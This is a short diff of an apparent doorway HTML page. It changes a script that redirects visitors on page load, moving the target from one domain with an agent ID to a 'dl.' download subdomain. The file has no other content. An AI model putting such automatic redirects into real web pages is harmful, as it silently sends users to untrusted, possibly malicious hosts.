--- a/01999221514.html
+++ b/01999221514.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.RY803.com/?AgentId=12087792"
+  window.location.href="https://dl.hawcyy.com/?parent=994442&t=1592635358"
 </script>
